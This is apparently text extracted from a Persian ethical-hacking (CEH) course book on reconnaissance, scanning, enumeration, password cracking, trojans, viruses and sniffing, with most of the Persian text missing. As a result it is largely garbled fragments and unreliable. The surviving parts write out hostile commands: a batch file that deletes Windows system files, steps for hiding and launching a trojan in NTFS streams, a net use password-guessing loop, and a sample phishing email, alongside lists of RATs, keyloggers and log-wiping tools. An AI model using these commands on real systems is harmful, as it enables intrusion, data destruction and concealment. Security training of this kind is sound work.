2

18

enumeration

36

61

Worm Virus Backdoor Trojan

87

Sniffer

108

Session hijacking Denial of Service

122

142

Buffer Overflow SQL Injection

164

10

178

11

189

12

200

13

IDS honeypot

211

14

223

15

229


CEH
. CEH
.


.
CEH
.


.

.
.

Mohsen_Azarnejad@yahoo.com
90



.
.
.
.

.
.
) (threat .
.

) (exploit
DoS .

exploit :
Remote exploit
.
Local exploit .
IT .
4

 ) (vulnerability .
.

) (target of evaluation .
) (attack .
.
.

.backdoor Sniffer rootkit exploit buffer overflow SQl injection
.
5

:
.

:
.

:Shrink-wrap code
. Microsoft word
.

:

.
.

.
.
.
) (insider ) (outsider
. .

. .


.
.

:1

.
.
. . ) social
(engineering ) (dumpster diving .
) (sniffing
IP
. :
.
7

 IP .
rattling the door knobe
.
.
.
.

:2
.
dialer
sweeper .
IP .
:3
.
.
) (LAN ) (local . session hijacking
DoS .stack-based buffer overflow ) owning the
(system .

 :4
.
backdoor
rootkit .
. zombie .
:5

.
log ) (IDS .
steganography log .

Hacktivisim
Hacktivisim . .
deface DoS
. ) (hacktivism .

: .
.
9

 : .

.
: . cracker
. .

. .
: .
) (.

cracker
" " !

.
.
cracker
DoS .
. .
.
cracker ) criminal hacker (
. ) (ethical hacker
.
.
10

)(Confidentiality

)(Integrity

)(Availability

. DoS .
DoS .

.

.

.
) (bit-flipping

.

.
11


.

.

.
. .

. .
.
.

.
.
.
.
12

 :
http://nvd.nist.gov
www.securitytracker.com
www.microsoft.com/security
www.securiteam.com
www.packetstormsecurity.com
www.hackerstorm.com
www.hackerwatch.org
www.securityfocous.com
www.securitymagazine.com
www.milworm.com

. .

:
.1
.2 ) (NDA
.3
.4
.5
.6

13


.
:

.
.

. :
) :(remote .
.
:dial-up War dialing .
.
: .
.
: .
.
14

 :
.
.
: .
rootkit key logger
.

.
) (target of evaluation
.

) (
) (Black box .
.
.
. :

. .

:

.
15

 ) (
.
.
.

.

) (
.
.
.

16


. .
.
. :





. .

.
.

17


) (footprinting .
footprinting .
. .
.

Footprinting
Footprinting
Footprinting .
.
.
.

Footprinting
Footprinting Footprinting .
.
.
.

19

 .
Google hacking http://groups.google.com .
. http://people.yahoo.com http://www.intellius.com
. Google hacking :

Site . .

Filetype .

Link hyperlink .

Cache . .

Intitle .

Inurl . .

INURL: [parameter=] with FILETYPE: [ext] and INURL: [scriptname] :

Novell BorderManager :
Intiltle: BorderManager information alert

.
.
:
IP
.
%90 %10 .

20


. footprinting
. :
Domain name lookup
Whois
Nslookup
Sam Spade

. whois DNS
IP .
.
21

 Footprinting :
Whois
Nslookup
ARIN
Neo Trace
VisualRoute Trace
SmartWhois
eMailTracker Pro
Website watcher
Google Earth
GEO Spider
HTTrack Web Copier
E-Mail Spider

DNS Enumeration
DNS DNS Enumeration.
DNS
IP .
ARIN DNSstuff NSlookup Whois
DNS enumeration .

Nslookup DNSstuff
nslookup . DNS
.
Sam Spade nslookup.
Whois nslookup IP

name server

) (AUTH1.NS.NY1.NET IP .

22

Whois

 DNSstuff . .
nslookup DNS
http://www.dnsstuff.com DNS .
DNS http://www.eccouncil.org DNSstuff.com .
http://www.eccouncil.org IP .
name server IP .

Whois ARIN Lookup

Whois
.
.
ICANN .
Whois
.
Whois) Smart Whois(
IP
Smart Whois . Basic Whois.
23

 ARIN IP .
ARIN Whois http://www.arin.net/whois .
Whois http://www.yahoo.com .
Whois .
IP
.
ARIN
.

ARIN http://www.yahoo.com
: ARIN RIPE NCC :
LACNIC .APNIC

24

Whois
( www.networksolutions.com ) Whois
: www.eccouncil.org Whois . Whois
Domain ID: D81180127-LROR
Domain Name: ECCOUNCIL.ORG
Created On: 14-Dec-2001 10:13:06 UTC
Last Updated On: 19-Aug-2004 03:49:53 UTC
Expiration Date: 14-Dec-2006 10:13:06 UTC
Sponsoring Registrar: Tucows Inc. (R11-LROR)
Status: OK
Registrant ID: tuTv2ItRZBMNd4lA
Registrant Name: John Smith
Registrant Organization: International Council of E-Commerce Consultants
Registrant Street1:67 Wall Street, 22nd Floor
Registrant Street2:
Registrant Street3:
Registrant City: New York
Registrant State/Province: NY
Registrant Postal Code: 10005-3198
Registrant Country: US
Registrant Phone: +1.2127098253
Registrant Phone Ext.:
Registrant FAX: +1.2129432300
Registrant FAX Ext.:
Registrant Email:forum@eccouncil.org
Admin ID: tus9DYvpp5mrbLNd
25

Admin Name: Susan Johnson

Admin Organization: International Council of E-Commerce Consultants
Admin Street1:67 Wall Street, 22nd Floor
Admin Street2:
Admin Street3:
Admin City: New York
Admin State/Province: NY
Admin Postal Code: 10005-3198
Admin Country: US
Admin Phone: +1.2127098253
Admin Phone Ext.:
Admin FAX: +1.2129432300
Admin FAX Ext.:
Admin Email:ethan@eccouncil.org
Tech ID: tuE1cgAfi1VnFkpu
Tech Name: Jacob Eckel
Tech Organization: International Council of E-Commerce Consultants
Tech Street1:67 Wall Street, 22nd Floor
Tech Street2:
Tech Street3:
Tech City: New York
Tech State/Province: NY
Tech Postal Code: 10005-3198
Tech Country: US
Tech Phone: +1.2127098253
Tech Phone Ext.:
Tech FAX: +1.2129432300
26

Tech FAX Ext.:

Tech Email:forum@eccouncil.org
Name Server: ns1.xyz.net
Name Server: ns2.xyz.net
Whois :
Wikto Footprinting Tool
Whois Lookup
SmartWhois
ActiveWhois
LanWhois
CountryWhois
WhereIsIP
ip2country
CallerIP
Web Data Extractor

Whois :
www.samspade.org
www.geektools.com
www.whois.net
www.demon.net
www.whatismyip.com

subnet mask .
IP . IP
ARIN AINA .
.
IP .
VisualRoute traceroute NeoTrace .

27

 .
IP IP
.

DNS
DNS :

:A IP

:SOA DNS

:CNAME

:MX

:SRV directory services

:PTR IP

:NS Name server

traceroute footprinting
Traceroute .
ICMP . ICMP
TTL . .
. tracerout

.
Sam Spade traceroute .
tracert hostname traceroute . traceroute
www.yahoo.com .

28

 .
tracert .

3D Traceroute
NeoTrace
VisualRoute Trace
Path Analyzer Pro
Maltego

Email Tracking
Email Tracking
. Email Tracking
.readnotify.com

29

 .
.
VisualRoute Mail Tracker eMail Tracker Pro .

Web Spider
Spammer Web Spider .
Web Spider .
Web Spider @ .
Web .
Spider . Web Spider
. Web Spider
robots.txt crawling
.
: robots.txt
.

Web data Extractor 1st E-Mail Address Extractor .

Footprinting
.1
.2 Whois
30

 .3 DNS
.4
.5
.6
.7 People Search
.8 NeoTracer
.9
.10 readnotify.com

.

.
. .

.

.
. .
.
VPN

.

31


.
.

:
:
help desk .
:
.
. phishing .

:
) :(Impersonating an employee or valid user
.
.
.
) :(Posing as an important user
.
.
.
) :(Using a third person
. .
32

 ) :(Calling technical support

. help desk .
.
) :(Shoulder surfing
.
) :(Dumpster diving
. .
.

. help desk .

Popup

.
.

Phishing

PIN .
33

 .
.
phishing .
.

keylogger . worm
.
.
:
Mail server report.
Our firewall determined the e-mails containing worm copies are being sent from your computer.
Nowadays it happens from many computers, because this is a new virus type (Network Worms).
Using the new bug in the Windows, these viruses infect the computer unnoticeably. After the
penetrating into the computer the virus harvests all the e-mail addresses and sends the copies of
itself to these e-mail addresses
Please install updates for worm elimination and your computer restoring.
Best regards,
Customer support service
Pop-up
. Pop-up
.

URL obfuscation
URL .
URL obfuscation URL .
204.13.144.2/Citibank Citibank .
URL obfuscation phishing
34

 .
. .
.
192.168.10.5 3232238085 .

.
.
.

.
. .

. .
.
.
.
. .

35

Enumeration


enumeration . enumeration
.
enumeration
.

.
IP
. IP
.

.
.
IP .

37

 .

)(Port scanning
)(Network scanning

IP

) (Vulnerability scanning

: TCP/IP .
.
. 80
. .
:
C:\Windows\system32\drivers\etc\services

:
. IP .
: .
service pack
.
.
) (IDS .
TCP/IP
. .

38


.
.

Ping Sweep
.
ping sweep IP .
ping .
ICMP ICMP ping
. ICMP
.
Ping sweep ICMP
.

39

 ping sweep .
.
Friendly Pinger Pinger Angry IP Scanner WS_Ping_Pro ICMP
.

Ping Sweep
IDS Ping Sweep IPS
. ping
ping sweep . ping
sweep . ping sweep
.
.

. .
.
.

.
.

.
:
40

IDS .

.

.

. stateful
TCP .

) (NIDS
Nmap .

.
.

Nmap
Nmap ping sweep IP
. Nmap
.
Nmap .
.
Nmap .
Nmap Nmap .
. .
Nmap
TCP connect
XMAS tree scan

TCP .
TCP XMAS-tree .
flag URG FIN PSH .

SYN stealth scan

) (half-open . SYN
41

. TCP . SYN-ACK
.

Null scan

. flag Null scan

.
. ACK scan
ACK scan .

Windows scan
ACK scan

: . Nmap
Nmap
-sT
-sS
-sF
-sX
-sN
-sP
-sU
-sO
-sA
-sW
-sR
-sL
-sI
-Po
-PT
-PS
-PI
-PB
-PB
-PM
-oN
-oX
-oG
-oA
-T Paranoid
-T sneaky

TCP connect scan
SYN scan
FIN scan
XMAS tree scan
Null scan
Ping scan
UDP scan
Protocol scan
ACK scan
Windows scan
RPC scan
List/DNS scan
Idle scan
Don't ping
TCP ping
SYN ping
ICMP ping
TCP and ICMP ping
ICMP timestamp
ICMP netmask
Normal output
XML output
Greppable output
All output
Serial scan; 300 sec between scans
Serial scan; 15 sec between scans
42

Serial scan; 4 sec between scans

Parallel scan
Parallel scan, 300 sec timeout, and 1.25 sec/probe
Parallel scan, 75 sec timeout, and 3 sec/probe

-T polite
-T Normal
-T Aggressive
-T Insane

Nmap cmd Nmap IP address

. 192,168,0,1 TCP connect
:
Nmap 192.168.0.1 sT
HPING2
Traceroute
Traceroute ... .
:
Hping2 10.0.0.5
TCP null-flags 0 10.0.0.5 .

Hping2 10.0.0.5 p 80
80 .

Hping2 a 10.0.0.5 s p 81 10.0.0.25

trusted party SYN 81 .

Hping www.debian.org p 80 A
80 www.debian.org ACK .

Hping www.yahoo.com p 80 A
IPID .
43

 IDLE NULL XMAS Stealth SYN FIN

:SYN SYN stealth
TCP . TCP/IP .
SYN SYN/ACK
. RST . SYN
stealth
.

:XMAS XMAS flag URG FIN PSH .

RST/ACK XMAS scan .
RFC 793 .

:FIN FIN XMAS FIN flag FIN .

scan XMAS scan .

44

 :NULL NULL XMAS FIN flag

.
:IDLE IDLE IP SYN .
IDLE scan . sequence number IP .

flag TCP
TCP )(3-way handshake
. .

TCP SYN . TCP SYN ACK
.
ACK .

45

 TCP ) (connection-oriented
. flag .
TCP flag PSH URG SYN RST ACK FIN . flag TCP
:
:(Synchronize) SYN .
:(Acknowledge) ACK .
:(Push) PSH .
:(Urgent) URG .
:(Finish) FIN .
:(Reset) RST .
flag TCP .
TCP
flag .
Flags sent by hacker
)All flags set (ACK, RST, SYN, URG, PSH, FIN
FIN
No flags set
SYN, then ACK
SYN, then RST

46

XMAS Scan
XMAS scan
FIN scan
NULL Scan
TCP connect/full-open scan
SYN scan/half-open scan

FloppyScan
.
mini Linux NMAP .
FloppyScan .

IPEye TCP Null FIN SYN XMAS .
) (Command-Line IPEye . .
) (closed . ) (reject
. ) (drop
. ) (open
.
IPSecScan IP IPSec
.
Hping2
traceroue mode ICMP UDP TCP .

47

 SNMP Scanner DNS ping SNMP

.
Netscan Tools Pro 2000, Hping2, KingPingicmpenum SNMP Scanner
.

War-Dialing
War dialing
. war dialing
dial-up War dialing .
.
remote access
remote-access .
. PAP
VPN .

War-dialing ) (dial-in .
.
war-dialing .

THC-Scan, ModemScan, ToneLoc, Phonesweep, war dialer telesweep
.
.
.
48

 Banner Grabbing
Banner Grabbing TCP/IP
.
. Banner grabbing .
. FTP
telnet . Microsoft Exchange
.
.
TCP .

.
.

sniffing .
IDS .
telnet banner grabbing .
telnet www.certifiedhacker 80 head / http/1.0
pof .
> pof I <your interface card number . Httprint Miart
HTTP Header . PING XPROBE2
Netcraft V2 .
:
Bidiblah

)Qualys Web-based Scanner (www.qualys.com/eccouncil

SAINT
ISS Security Scanner
)Nessus (for Softwares

49

GFI LANGuard
SATAN
Retina
Nagios
)NIKTO (for Web Servers
SAFEsuite Internet Scanner
IdentTCPScan

:
FriendlyPinger
LANsurveyor
Ipsonar
LANState

)Insightix Visibility (www.insightix.com

)IPCheck Server Monitor (www.paessler.com

PRTG Traffic Grapher

. )(proxy server
.
.
.
.
50

 :
SocksChain
Proxy Workbench
ProxyManager
Super Proxy Helper
MultiProxy
TOR Proxy Chaining Software
Proxy Finder
ProxyBag
AutomatedProxy Leecher

) (Anonymizer
.

.
) (Anonymizer
51

 .
.
:
StealthSurfer
Browzar
Torpak Browser
GetAnonymous
IP Privacy
Anonymity 4 Proxy
Psiphon
AnalogX Proxy
NetProxy
Proxy+
ProxySwitcher Lite
JAP
Proxomitron

HTTP Tunneling
IDS ) (SMTP
) (HTTP . IDS
.
HTTP HTTP
tunneling ) IM (
.

Httptunnel
HTTP telnet
. hts 80
23 :
Hts F server.text.com:23 80

52

 htc . P
.
htc -P proxy.corp.com:80 -F 22 server.test.com:80
telnet localhost 80 80
23 .

IP Spoofing
IP .
(IP Spoofing) IP TCP .

53

 ) (source routing
. IDS
.
.

IP address spoofing TTL TTL : TTL

.
:
tracert -j 10.0.0.50 10.0.0.5
hping2 -G 10.0.0.50 10.0.0.5
IP Source Routing .

Enumeration
enumeration
.
.
enumeration
. .
IP .
IP MAC address .
54

 2000 new view NetBIOS .

net view :
New view / domain
Nbtstat A IP address
share .

Null Session
Null session NetBIOS null .
sessions CIFS SMB.
SMB / CIFS .

NetBIOS null session

share . SMB
NetBIOS API 139 .
NetBIOS null session IPC$ .
net use . net use share
. )""(
. NetBIOS null session 192,21,7,1
net use :
55

 C:\> net use \\192.21.7.1\IPC$ /u:

Windows:

$ smbclient \\\\target\\ipc\$ U

Linux:

net use
.
:
.GetAcct user2sid sid2user enum SuperScan Nbtstat NetView DumpSec

Null Session
Null sessions 139 137 135 TCP 445 .
. SMB
) (TCP/IP WINS client .
:
.1 properties .
.2 TCP/IP Properties .
.3 Advanced .
.4 WINS disable NetBIOS Over TCP/IP .

.
:
Regedt32 .1 HKLM\SYSTEM\CurrentControlSet\LSA.
.2 Edit Add Value :
Value name: RestrictAnonymous .a
Data Type: REG_WORD .b
Value: 2 .c

56

 PS Tools enumeration . .
:PsExec
:PsFile
:PsGetSid SID
:PsKill
:PsInfo
:PsList
:PsLoggedOn local share
:PsLogList log
:PsPasswd
:PsService
:PsShutdown
:PsSuspend
:PsUptime

SNMP Enumeration
SNMP
SNMP . SNMP agent :
SNMP management station agent .
SNMP
agent SNMP management station .
agent agent Trap . management station
57

 agent MIB .
.
SNMP SNMP agent management station
. read community string .
. read/write community string
. read community string public

read/write

community string private .

community string .
.
www.defaultpasssword.com .

UNIX Enumeration Getif SNScan Solarwinds SNMPutil enumeration

.

SNMP enumeration
SNMP enumeration SNMP agent
SNMP . SNMP community
string . Group Policy
SNMP .

DNS Zone 2000

zone transfer nslookup .
:
Nslookup ls d domainname
nslookup
:
58

)_Global Catalog service (_gc._tcp

)Domain controllers (_ldap._tcp
)Kerberos authentication (_kerberos._tcp

properties DNS server .

LDAP . LDAP
.
LDAP Windows 2000 LDAP client . (ldp.exe) Active Directory Administration Tool
.
CD 2000 Support\Reskit\Netmgmt\Dstool .
:
.1 ldp.exe 389 .
.
.2 Connection Authentication .
. Guest .
.3 Search
Browse.
:
JXplorer
LdapMiner
Softerra LDAP Browser
NTP Enumeration
SMTPscan
Asnumber
Lynx
Winfingerprint
IP Tools Scanner
NBTScan
NetViewX
FreeNetEnumerator
Terminal Service Agent
TXDNS
Unicornscan
59

 enumeration
.
:
.1 enumeration .
.2 null session .
.3 Windows enumeration Superscan .

60


.
.
.

.
.
.

.
brute-force .

.
:
.1 ) Administrator .(Guest
.2 .
.3 .
.4 .
.5 .

62

 .
.

.
hash .
hash hash .
hash
.
SAM shadow .

Legion NetBIOS .
IP share .
NTInfoScan NT 4.0 NTInfoScan .
HTML .
Smbbf SMB .
53000 .
L0phtCrack . dictionary
brute-force hybrid.
John the Ripper Unix NT .
case insensitive .
63

 KerbCrack kerbsniff : .kerbcrack kerbsniff

Windows 2000/XP kerbcrack
brute force dictionary.

LanManager Hash
2000 NT Lan Manager (NTLM) hashing
. NTLM hashing . 123456abcdef .
NTLM .123456ABCDEF :
blank 14 .123456ABCDEF__ :
14 123456A : __ .BCDEF
:
123465A = 6BF11E04AFAB197F
BCDEF__ = F1E9FFDCC75575B15
hash 6BF11E04AFAB197F F1E9FFDCC75575B15 .

NTLM v1 LM NTLM v2

LM

NTLM v1

NTLM v2

hash

56bit+56bit

hash

)DES (ECB mode

MD4

MD4

hash

64bit+64bit

128bit

128bit

C/R

56bit+56bit+16bit

56bit+56bit+16bit

128bit

C/R

)DES (ECB mode

)DES (ECB mode

HMAC_MD5

C/R

64bit+64bit+64bit

64bit+64bit+64bit

128bit

64

 2000
SAM hash
Windows\system32\config .
. SAM
DOS Linux CD . repair
. RDISK ) (rdisk /s
SAM __ SAM. c:\windows\repair .
cmd :
C:\>expand sam.__ sam
L0phtCrack dictionary
brute-force hybrid .

Win32CreatedLocalAdminUser x
administrator . Metasploit
Metasploit framework .
Offline NT Password Resetter administrator .
CD Linux NTFS
.
LCP XP 2000 NT 2003
Hybrid Dictionary Brute force.
Asterisk Logger Access Pass View Crack Ophcrack2 SID&User
Asterisk Key .

65

 SMB Logon
SMB logon
. NTLM sniff
.
SMB Server .
.
SMB :

SMBRelay SMB Server hash SMB
SMBRelay . man-in-the-middle .
SMBRelay2 SMBRelay IP NetBIOS
.
Pwdump2 hash SAM .
L0phtCrack .
Samdump NTLM hash SAM .
C2MYAZZ
. .
66

 SMB Relay MITM

SMB Relay MITM .
.

SMB relay 2000 SMB signing

SMB . Security Policies/Security
Options .

SMBGrind L0phtCrack dump .
SMBDie SMB XP 2000
NT crash.
NBTdeputy NetBIOS NetBIOS
. SMBRelay .

. 8 12 .
hash
67

 . SYSKEY
log . brute-force
.
hash . 15
LM hash NT hash LM hash NT hash
brute force . LM hash SAM
. NTLM v2 NTLM Kerberos NT hash
LM LM hash NT hash . 98 95
:
:1 Group Policy Security Options Local Security Policy
Network security: Do not store LAN Manager hash value on next password change :

:2 :
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa
NoLMHash .

:3 15 .
:
.1 .
.2 .
.3 whois
.
.4 .
.5 21 .

68

) (expire
.
.
. 30 .
.

Event Viewer Log

Event Viewer log
.
.
VisualLast log .
NT event log
.

.

69

Event log c:\\windows\system32\config\Sec.Event.Evt

brute-force .
AccountAudit
... .

.
:

. EC Council

:
o )($,:"%@!#
o
o
o

70


. :
:Passive online . passive online
man-in-the-middle sniffing reply.
:Active online Administrator . active online .
:Offline hybrid Dictionary brute-force.
Shoulder surfing :Nonelectronic .

Passive Online
passive online .
.
. hash
. hashing
toolkit
.

71

 passive online (MITM) man-in-the0-middle . MITM

. sniffer
sniff .
reply passive online
.
MITM -
.

Active Online

. active online
.

NetBOIS TCP 139

2000 NT . ) IPC$ (C$
. Administrator Admin
Sysadmin.
.
C :
\\ip_address\c$
72


.
.

.
Windows shell NET
USE . :
.1 Windows Notepad username password .
Dictionary Generator .
C: drive as credentials.txt .
.2 pipe FOR:
)C:\> FOR /F token=1, 2* %i in (credentials.txt
.3 net use \\targetIP\IPC$ %i /u: %j credentials.txt
share .

.
. .
.

) ( .
) ( )(
.

73


.
.
. .
:

Dictionary attack

Administrator

Hybrid attack

Adm1n1strator

Brute-force attack

Ms!tr245@F5a

.
. hash
. hash hash
.
.
hybrid .
.
1 .
brute-force . brute-
force .
.

74

Pre-Computed Hashes
hash
. hash
.

Nonelectronic
.
sniff shoulder surfing .

.
. help desk
.
.
Shoulder surfing .
.
.
.

.
.

75


:
http://www.defaultpassword.com
http://www.cirt.net/passwords
http://www.virus.org/default-password
PDF Password Cracker Abcom PDF Password Cracker
PDF .

keylogger spyware
keystroke logger
(keylogger) keystroke logger . .
keystroke logger
. keylogger
.
Keylogger
Keylogger .
.

Spector ) (spyware
.
Anti-spector . .

76

 eBlaster
eBloster .
.
SpyAnywhere
SpyAnywhere .
history .
Fearless Key Logger .
log .
E-mail Keylogger .
/ .
.
Keylogger :
Revealer Keylogger
Handy Key Logger
Ardamax Keylogger
Powered Keylogger
ELITE Keylogger
Quick Keylogger
Spy-Keylogger
Perferct Keylogger
Invisible Keylogger
Actual Spy
Spytector FTP Keylogger
IKS Software Keylogger
Ghost Keylogger

.
.
.

77

 .

.
.
administrator
.

GetAdmin.exe administrator .
NT .
GetAdmin.exe . . Windows NT
4.0 SP3 .
HK.exe admin administrator .
Active@ Password Changer administrator local.
x.exe X X
administrator.

administrator
. back door
) ( keystroke logger
. .

78


PsExec .
.
Remoxec RPC DCOM .
Task Scheduler DCOM .
Alchemy Remote Executer
.
Esma FlexInfo Pro
CPU usage ....

Buffer Overflows
) Buffer overflows ( .
.

. cmd shell .

Rootkit
Rootkit .
Rootkit backdoor .
backdoor Rootkit .
rootkit
.

79

 rootkit :
:Kernel-level rootkits rootkit
doorback .
Kernel-level rootkit .
.
:Library-level rootkits rootkit ) (library
.
:Application-level rootkits rootkit
patch .

Rootkit 2000 XP
Windows NT/2000 rootkit Rootkit .
NT kernel Rootkit .
blue scrren
EXE .
Rootkit kernel mode device driver _root_.sys
DEPLOY.EXE . _root_.sys DEPLOY.EXE
DEPLOY.EXE . rootkit
. DEPLOY.EXE . _ net stop _root
_ rootkit net start _root stop restart . rootkit _root_.sys
.

80

 rootkit
rootkit administrator
. rootkit
.
MD5 checksum . 128 MD5 checksum
. checksum .
. checksum
.

Tripwire .
checksum Tripwire

.

.
. .
attrib . attrib :
]Attrib +h [file/directory
NTFS data streaming .
NTFS alternate data streams
. .

81

NTFS File Streaming

NTFS file stream :
.1 cmd noepad test.txt .
.2 .
.3 cmd dir test.txt .
.4 cmd notepad test.txt:hidden.txt .
.
.5 ) (.
Test.txt .6 . .
.7 type test.txt:hidden.txt cmd . .
.8 Trojan.exe Readme.txt :
C:\> type c:\Trojan.exe > c:\Readme.txt:Trojan.exe
.9 Trojan.exe Readme.txt :
C:\> start c:\Readme.txt:Trojan.exe
.10 extract Trojan.exe Readme.txt :
C:\> cat c:\Readme.txt:Trojan.exe > Trojan.exe

Makestrm.exe alternate data stream
.

NTFS Stream
stream file FAT
NTFS . FAT stream
streaming NTFS .

LNS.exe NTFS streams . steam
.

82

 Steganography
Steganography .

. steganography .

ImageHide steganography .
.
. sniffer
.
Blindside steganography BMP .
MP3Stego .
MP3 bit stream .
Snow whitespace steganography ASCII
whitespace . whitespace
.
.
Camera/Shy IE
gif .
Masker Steganography .
83

 Stealth Files PowerPoint Excel Word Acrobat

.
:DCPP .

steganography :
wbStego Gifshuffle Pretty Good Envelop Steganos Steghide S- Tools Blindside Fort Knox
.Video Steganography FoxHole Stegomagic StegaNote Cloak Hydan Data Stash OutGuess

steganography .

Stegdetect steganographic
Steganography .
Dskprobe CD 2000 .
steganography .

.
.
.

84

 Auditing
auditingauditing .
log Windows Event Viewer .
Event log .
.
.

AuditPol auditing .
.

Event Log
Windows Event Viewer .
.
auditing
Event Viewer
AuditPol
auditing .
event log .

85


Elsave.exe event log . .
WinZapper security log
2000 WinZapper . .
Evidence Eliminator data cleaning
. system files Internet cache Recycle bin
temp folders ... Evidence Eliminator .
.
:
Traceless
Tracks Eraser Pro
Aromor
ZeroTracks
PhatBooster

86

Trojan, Backdoor, Virus, Worm


backdoor
:
. backdoor toolkit
.
worm backdoor .
backdoor
. backdoor worm
.
.

backdoor
Backdoor
. backdoor log
backdoor
.
backdoor .
backdoor .

.

. backdoor :
88

 log . backdoor
.
RAT backdoor
. RAT

. backdoor RAT
: .
.

.

. DDOS
.
.

.
: IRC
. spyware
89

 .
.
.
.
Protocol
UDP
UDP
TCP
TCP
TCP
TCP
TCP

Port
31337 or 31338
2140 or 3150
12345 and 12346
12361 and 12362
20034
21544
3129, 40421, 40422, 40423, and 40426

Trojan
BackOrifice
Deep Throat
NetBus
Whack-a-mole
NetBus 2
GirlFreind
Masters Paradise

overt covert
overt . covert
.
covert .
covert
.
Covert
. 80 .telnet

90


Loki shell ICMP
backdoor . ICMP .
Loki .

91


. :

:(RAT) Remote Access Trojans .

:Data-Sending Trojans .

:Destructive Trojans .

:Denial of Service Trojans DoS .

:Proxy Trojans .

:FTP Trojans FTP .

:Security software disabler Trojans .

Reverse-connecting
reverse-connecting
.
.reverse WWW shell ) 60(
.
92

 Reverse WWW shell . HTTP .

. .

TROJ_QAZ notepad.exe note.com
notpad.exe . Notepad
. backdoor
7597 . TROJ_QAZ
.
Tini backdoor . 7777
Cmd . Tini Server
telnet 7777.
iCmd tini .
Proxy Server Trojan .
.

Donald Dick backdoor

. .
keylogger registery parser CD-ROM
.
23476 23477.
SubServen
. IRC ICQ
.
.

93

 NetBus Donald Dick . NetBus Server

HKEY_CURRENT_USER

HKEY_CURRENT_USER\NetBus

Server\General\TCPPort . NetBus
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices
NetBus Server .
BackOrifice 2000
TCP/IP BackOrifice .
.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices
Plug-in . BackOrifice
remote desktop 3DES
UDP ICMP . ...
ComputerSpy Key Logger
: AIM AOL MSN ICQ Yahoo
Messanger .webmail
.
Beast WinLogon.exe .
Windows Explorer Internet Explorer .
all-in-one
.
CyberSpy Telnet Trojan
.
ICQ TCP/IP .
SubRoot 1700
.
LetMeRule .
Cmd .
.
94

 Firekiller 2000 .
ATGuard
.
Hard Drive Killer Pro DOS
. .
) ( 1 2
.
Satellite- Turkojan DownTroj Biorante RAT T2W Backdoor.Theef :
HackerzRat SharK Rapid Hacker Poison Ivy Trojan.Hav-Rat DarkLabel B4 Yakoza RAT
AccRat OD Client ProAgent Optix PRO VicSpy Criminal Rat Beta 1337 Fun Trojan TYO
VNC Trojan TinyFTPD ZombieRat ConsoleDevil SINner RubyRAT Public Mhacker-PS
DaCryptic Dark Girl ProRat Troya Biohazard RAT Skiddie Rat DJI RAT Webcam Trojan
.Hovdy.a PokerStealer.A Net-Devil

Netcat
Netcat TCP UDP
. telnet shell .

.
CD-ROM background screen saver
.
.
:

.
95

Start .

ISP IP scanning .

taskbar .

Ctrl+Alt+Del .

Wrapping
Wrapper .
.
. wrapper
.
.

96


Graffiti .
.
.
RemoteByMail .
.

Silk Rope 2000 wrapper BackOrifice server .

EliTeWrap wrapper .
EliTeWrap
.
IconPlus .

.

.

.

signature .
Trojan Horse Construction Kit Senna Spy Generetor :
Progenic Mail Trojan Construction Kit v2.0 .Pandoras Box
97


spyware .
backdoor
.
.

.
.

backdoor
.
.

98

Fport Netstat TCPView

.

Insider What's on my computer Process Viewer

.

What's on my computer MS Config

.

Ethereal .

Trojan scanner .

Port-Monitoring and Trojan-Detection

Fport TCP UDP . fport
.
Dsniff filesnarf Dsniff .
urlsnarf msgsnarf mailsnarf WebSpy
Sshmitm . webmitm man-in-the-middle
SSH HTTP (HTTPS) SSL .
PrcView
PrcView .
.
Inzider .
Inzider . BackOriffice
Task Manager
.
TCPView endpoint TCP UDP
.
99

 Tripwire .
hash . Tripwire
.
.
Hijack Autoruns What's Running Super System Helper CurrPorts :
.Startup List This

2003 (Windows File Protection) WFP
. TTF OCX DLL SYS EXE
WFP .
.
sigverif .
sigverif :
.1 Start .
.2 Run .
.3 sigverif start . .
System File Checker
.
Windows\system32\dllcache overwrite . System File Checker
sfc/scannow.
XoftspySE Comodo BOClean TrojanHunter :
.SPYWAREfighter Spyware Doctor

100

 worm
worm
. worm backdoor .
worm backdoor
.

worm
worm ) (malware .
.
. :
.

101

 : ) (Infection ).(Attack
EXE
:

fragment :

102

Internet Explorer

worm worm .

. worm
.

103


: .
:

DLL INI

) (BAT

)(Source code

:
) polymorphic ( :
.
:Stealth
.
:Sparse infector .

:Armored .
104

 :Cavity .

:Tunneling
.
) Companion( : .
companion notepad.com notepad.exe
) notepad.com ( .

) Camouflage( : .
:Bootable CD-ROM CD-ROM
. CD-ROM
. CD-ROM
.

105

 NTFS :Active Directory NTFS Active Directory

.

) (batch file Game.bat :
@ echo off
*Del c:\winnt\system32\*.
*Del c:\winnt\*.
bat2com Game.com .
WINNT
.

. :
Kefi's HTML Virus Construction Kit
Virus Creation Laboratory v1.0
The Smeg Virus Construction Kit
Rajaat's Tiny Flexible Mutator v1.1
Windows Virus Creation Kit v1.00

.
.
.
.

106

checksum

)(virus signature

:
.1 . .
.2 netstat.exe fport.exe listdlls.exe handle.exe
pslist.exe .
.3 .
.
.4 .
.

Notepad EICAR.COM
. .
*X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H

107

Sniffer


Sniffer .
. sniffer
.
Sniffer .
sniffer sniffer
.
sniffer . sniffer
sniffer .

sniffer MAC address MAC
address . ) (promiscuous mode .
MAC address
. ) (promiscuous mode
sniffer . ) (promiscuous mode
. promiscuous-mode
.
sniffing . HTTP
SNMP POP3 FTP sniffer
.

109


Ethereal sniffer .
WireShark Ethereal .
.
.
Snort ) (IDS .
buffer overflow Server Message Block (SMB) CGI
probes OS fingerprinting .
WinDump tcpdump .
WinDump tcpdump rule
.
EtherPeek .
OmniPeek .
WinSniffer .
IMAP Telnet SMTP ICQ HTTP POP3 FTP NNTP .
Iris
. sniffer Iris
.
.Wiretap Pilot Look@LAN The Dude Sniffer :

: . ) (passive sniffing
.
) (active sniffing ARP spoofing traffic-flooding
.
110

 .
passive packet sniffer
. .
MAC address . MAC table
MAC address .
MAC address
.
.

111

ARP Poisoning
ARP IP MAC . TCP/IP
MAC address .
ARP MAC address . ARP
broadcast : IP
IP ARP MAC address TCP/IP
.
ARP poisoning
sniff ARP poisoning .
ARP ARP spoofing .
MAC address .

) (DoS . ARP spoofing man-in-the-middle
ARP spoofing
.

112

 ARP spoofing MAC address gateway ARP cache

. ARP s Cmd IP MAC
